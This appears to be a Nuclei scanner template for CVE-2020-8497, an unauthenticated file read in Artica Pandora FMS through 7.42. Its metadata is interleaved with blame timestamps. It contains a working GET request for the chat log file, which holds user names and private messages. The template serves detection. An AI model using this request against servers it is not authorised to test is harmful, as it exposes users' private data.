2021-12-05 23:36:14 +00:00
id : CVE-2020-8497
info :
2023-04-04 20:20:19 +00:00
name : Artica Pandora FMS <=7.42 - Arbitrary File Read
2021-12-05 23:36:14 +00:00
author : gy741
severity : medium
2023-04-10 19:56:05 +00:00
description : Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
2021-12-06 05:09:43 +00:00
reference :
- https://k4m1ll0.com/cve-2020-8497.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
2021-12-05 23:36:14 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-12-05 23:36:14 +00:00
cve-id : CVE-2020-8497
cwe-id : CWE-306
2023-04-12 10:55:48 +00:00
epss-score : 0.002
2023-10-30 20:55:37 +00:00
epss-percentile : 0.57609
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : artica
product : pandora_fms
tags : cve,cve2020,fms,artica
2021-12-05 23:36:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-05 23:36:14 +00:00
- method : GET
path :
- '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
matchers-condition : and
matchers :
- type : word
part : body
2021-12-06 05:09:43 +00:00
words :
- '"type"'
- '"id_user"'
- '"user_name"'
- '"text"'
2021-12-05 23:36:14 +00:00
condition : and
- type : status
status :
- 200
2023-10-29 15:59:44 +00:00
# digest: 490a00463044022055c70d093acb2fbffb7c44b3d4a77b9e74c63f1be9a9f2fa2de8df24d7042492022067bd89c8fe1b13b68356361d9879586b396b65c0fa4f76d090a1f87b7c3fabe7:922c64590222798bb761d5b6d8e72950